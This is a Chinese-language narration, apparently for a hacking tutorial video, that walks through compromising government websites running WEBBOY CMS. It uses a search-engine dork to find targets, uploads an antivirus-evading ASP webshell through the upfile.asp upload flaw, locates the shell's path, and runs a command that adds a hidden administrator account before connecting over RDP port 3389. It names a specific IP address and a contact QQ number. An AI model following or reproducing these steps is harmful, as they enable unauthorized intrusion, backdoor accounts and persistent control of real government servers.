大家好,此动画也就是一个老漏洞.
不过我不是用挖掘机.
直接在百度要么是谷歌,都可以.
关键字:Powered by WEBBOY
不过有好多都修了.
不过我们要找一些关于news/
这个一般都是政府的.
www.ww.gov.cn/news/
我就不在一一去找了.
大家看好..
这里自己搞个免杀的ASP小马也可以.大马也可以
最好是你的ASP马免杀.
不好意思.没有加upfile.asp

上传类型点动力上传漏洞
Cookies不变
点好后,在上传,

提示成功.
现在我们来找马的路径:

UploadFiles/20074242222496.asp

www.ww.gov.cn/news/UploadFiles/20074242222496.asp
我们来进进看看.
大家看到了吧!

在进一步
看到了吧.全是政府的
cmd /c net user bobo$ bobo520 /add & net localgroup administrators user13$ /add

提权完毕,已执行了命令：
cmd /c net user bobo$ bobo520 /add & net localgroup administrators user13$ /add

当前终端服务端口: 3389
系统自动登录功能未开启
在来找一下IP
218.22.226.142
这里没有建成功,
好了,大家可以找找一些相关的提权动画看看

用我刚刚提的怅号进进看看.
在用3389联接一下

提一下看看.

我们进一步看看.

用挖掘机          
关键字：Powered by WEBBOY
页面：/upfile.asp

QQ:3936728